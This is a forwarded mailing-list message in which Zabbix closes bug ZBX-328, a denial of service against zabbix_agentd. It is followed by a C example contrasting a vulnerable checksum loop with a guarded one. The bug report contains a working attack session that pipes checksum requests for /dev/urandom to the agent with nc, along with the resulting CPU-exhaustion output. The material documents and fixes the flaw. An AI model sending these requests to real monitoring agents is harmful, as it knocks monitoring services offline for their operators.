hi,
see upstream's response.
----- Forwarded message from "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]> -----
From: "Alexei Vladishev (ZABBIX Support)" <[EMAIL PROTECTED]>
Date: Tue, 25 Mar 2008 16:31:18 +0200 (EET)
To: [EMAIL PROTECTED]
Subject: [ZABBIX] Closed: (ZBX-328) Possible DoS against zabbix-agentd
[ https://support.zabbix.com/browse/ZBX-328?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Alexei Vladishev closed ZBX-328.
--------------------------------
Resolution: Fixed
The problem was fixed a couple of months ago. Please wait for 1.4.5. It will be
released this week.
Alexei
> Possible DoS against zabbix-agentd
> ----------------------------------
>
> Key: ZBX-328
> URL: https://support.zabbix.com/browse/ZBX-328
> Project: ZABBIX
> Issue Type: Bug
> Components: Agent (Unix)
> Environment: Debian etch, kernel 2.6.18, Intel(R) Pentium(R) 4 CPU 2.80GHz
> Reporter: Milen Rangelov
> Assignee: Alexei Vladishev
>
> An authorized host can cause the zabbix_agentd to hang, overconsuming CPU
> resources.
> This can be triggered by sending the agent a file checksum request
> (vfs.file.cksum[file]) with the file argument being some "special" device file
> like /dev/zero or /dev/urandom (the latter raises kernel CPU usage even more).
> If the malicious user sends <number_of_zabbix_agentd_children> requests, then
> the zabbix_agentd service will not be able to serve any requests until it's
> restarted.
> Here's an example session:
> ------------
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [1] 24429
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [2] 24431
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [3] 24433
> gat3way:/etc/zabbix# echo "vfs.file.cksum[/dev/urandom]" | nc localhost 10050 &
> [4] 24435
> ...and some output from top:
> <snip>
> Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie
> Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
> <snip>
> PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
> 24381 zabbix 30 5 5056 1032 768 R 65 0.1 4:16.01 zabbix_agentd
> 24382 zabbix 30 5 5068 1044 776 R 50 0.1 4:12.18 zabbix_agentd
> 24380 zabbix 30 5 5068 1044 776 R 50 0.1 4:01.24 zabbix_agentd
> 24379 zabbix 30 5 5056 1036 772 R 31 0.1 4:08.24 zabbix_agentd
> ------------------------
> zabbix_agentd accepts new connections, but does not serve them.
> The malicious user needs to connect from an authorized host, but it's not so
> hard to spoof it if he's on the same Ethernet segment as the host running the
> zabbix_agent.
----- End forwarded message -----
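The hang in the report comes from the agent's checksum routine reading a client-named path until EOF, which a character device such as /dev/zero or /dev/urandom never delivers. The following is an added illustration, not Zabbix code, and it does not reproduce the actual ZBX-328 fix shipped in 1.4.5 (the thread does not describe it). It implements the POSIX cksum CRC (polynomial 0x04C11DB7, length appended, final complement) in two shapes: the unguarded read loop that spins forever on a device, and a guarded version that opens with O_NONBLOCK so a FIFO cannot block open(), uses fstat() to refuse anything but a regular file, and caps the bytes read. The error codes, the 64 MiB cap in main() and the function names are this example's own assumptions.

```c
/* Added example, not Zabbix code: the shape of the ZBX-328 hang and one
 * way to guard against it. The CRC is the POSIX cksum algorithm; the
 * guards, caps and error codes are this example's assumptions, not the
 * 1.4.5 fix. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

enum { CK_OK = 0, CK_ERR_OPEN = -1, CK_ERR_NOT_REGULAR = -2,
       CK_ERR_TOO_BIG = -3, CK_ERR_READ = -4 };

/* Feed n bytes into the cksum CRC (bitwise, MSB first, poly 0x04C11DB7). */
static uint32_t crc_update(uint32_t crc, const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        crc ^= (uint32_t)p[i] << 24;
        for (int b = 0; b < 8; b++)
            crc = (crc & 0x80000000u) ? (crc << 1) ^ 0x04C11DB7u : crc << 1;
    }
    return crc;
}

/* Finish as cksum(1) does: feed the byte length little-endian, then invert. */
static uint32_t crc_finish(uint32_t crc, uint64_t len)
{
    for (; len != 0; len >>= 8) {
        unsigned char c = (unsigned char)(len & 0xff);
        crc = crc_update(crc, &c, 1);
    }
    return ~crc;
}

/* Checksum of an in-memory buffer; empty input yields 4294967295. */
uint32_t cksum_bytes(const unsigned char *p, size_t n)
{
    return crc_finish(crc_update(0, p, n), (uint64_t)n);
}

/* Shared read loop. max_bytes == 0 means unbounded (the original bug). */
static int read_and_sum(int fd, uint64_t max_bytes, uint32_t *out)
{
    unsigned char buf[4096];
    uint32_t crc = 0;
    uint64_t total = 0;
    for (;;) {
        ssize_t n = read(fd, buf, sizeof buf);
        if (n < 0) {
            if (errno == EINTR) continue;
            return CK_ERR_READ;
        }
        if (n == 0) break;              /* EOF: never arrives on /dev/zero */
        total += (uint64_t)n;
        if (max_bytes != 0 && total > max_bytes)
            return CK_ERR_TOO_BIG;      /* file grew past the cap mid-read */
        crc = crc_update(crc, buf, (size_t)n);
    }
    *out = crc_finish(crc, total);
    return CK_OK;
}

/* Vulnerable shape: open whatever path the client named and read to EOF.
 * On /dev/zero or /dev/urandom this never returns, so one request pins one
 * agent child for good, as in the report. Never call this on a device. */
int cksum_unguarded(const char *path, uint32_t *out)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return CK_ERR_OPEN;
    int rc = read_and_sum(fd, 0, out);
    close(fd);
    return rc;
}

/* Guarded shape: O_NONBLOCK so a FIFO cannot block open(), fstat() to
 * refuse anything but a regular file, and a byte cap on what is read. */
int cksum_guarded(const char *path, uint64_t max_bytes, uint32_t *out)
{
    int fd = open(path, O_RDONLY | O_NONBLOCK);
    if (fd < 0) return CK_ERR_OPEN;
    struct stat st;
    int rc;
    if (fstat(fd, &st) != 0)                    rc = CK_ERR_OPEN;
    else if (!S_ISREG(st.st_mode))              rc = CK_ERR_NOT_REGULAR;
    else if ((uint64_t)st.st_size > max_bytes)  rc = CK_ERR_TOO_BIG;
    else rc = read_and_sum(fd, max_bytes, out); /* regular files ignore O_NONBLOCK */
    close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s FILE\n", argv[0]); return 2; }
    uint32_t sum;
    int rc = cksum_guarded(argv[1], 64u << 20, &sum);  /* 64 MiB cap: assumption */
    if (rc != CK_OK) { fprintf(stderr, "refused (%d)\n", rc); return 1; }
    printf("%u\n", sum);
    return 0;
}
```

The byte cap only bounds size; an agent child also needs a wall-clock bound (alarm() or an equivalent of the agent's request timeout) so that a large regular file on slow or hung storage cannot hold a worker past the server's timeout either. Running the guarded routine on /dev/urandom returns CK_ERR_NOT_REGULAR immediately instead of spinning.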